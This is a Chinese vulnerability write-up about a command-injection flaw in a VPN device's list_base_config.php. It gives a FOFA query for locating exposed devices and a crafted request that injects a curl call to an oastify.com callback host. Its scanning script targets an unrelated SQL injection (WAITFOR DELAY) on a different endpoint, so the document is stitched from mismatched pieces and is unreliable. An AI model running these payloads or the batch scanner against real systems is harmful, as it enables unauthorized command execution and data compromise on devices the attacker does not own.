》》》漏洞描述《《《
网络设备是支撑计算机网络运行的重要硬件,包括路由器、交换机、网桥、网卡、集线器、防火墙、调制解调器和无线接入点等。路由器负责网络间的数据转发和地址转换,交换机用于局域网内设备的互联和数据交换,网桥连接不同网段实现互通,网卡提供有线或无线网络接口。防火墙则对网络流量进行监控和控制,保护网络安全。某某康达vpn,其接口list_base_config.php存在命令执行漏洞,攻击者可通过该漏洞获取系统权限。
》》》资产收集《《《
1)信息收集
fofa:body="/images/raisecom/back.gif"
》》》漏洞复现《《《
1.构造数据包
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60curl%201111.7rzhzevp0iszj2p5s5186r25jwpndf14.oastify.com%60 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
1.使用DNSLog.cn获取一个Domain
构造数据包,执行curl命令访问DNSLog生产的domain
3.DNSLog获取服务器的IP地址
》》》测试工具《《《
import requests
import urllib3
from urllib.parse import urljoin, quote
import argparse
import ssl
import re
# 禁用SSL证书验证,忽略警告
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def read_file(file_path):
"""
读取文件中的URL列表
:param file_path: 文件路径
:return: URL列表
"""
with open(file_path, 'r') as file:
urls = file.read().splitlines()
return urls
def check(url):
"""
检查目标URL是否存在SQL注入漏洞
:param url: 目标URL
:return: 如果存在漏洞,返回True
"""
url = url.rstrip("/")
target = urljoin(url, "/SystemManager/Api/TicketManager.ashx")
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
# 构造SQL注入数据包
data = "Method=GetReServeOrder&solutionId=1' WAITFOR DELAY '0:0:5'--"
try:
response = requests.post(target, verify=False, headers=headers, timeout=25, data=data)
# 判断响应状态码、响应内容以及响应时间是否符合预期
if response.status_code == 200 and 'Table' in response.text and 5 < response.elapsed.total_seconds() < 10:
print(f"\033[31mDiscovered:{url}: zckxTicketManager_SQLInject!\033[0m")
return True
except Exception as e:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="URL")
parser.add_argument("-f", "--txt", help="file")
args = parser.parse_args()
url = args.url
txt = args.txt
if url:
check(url)
elif txt:
urls = read_file(txt)
for url in urls:
check(url)
else:
print("help")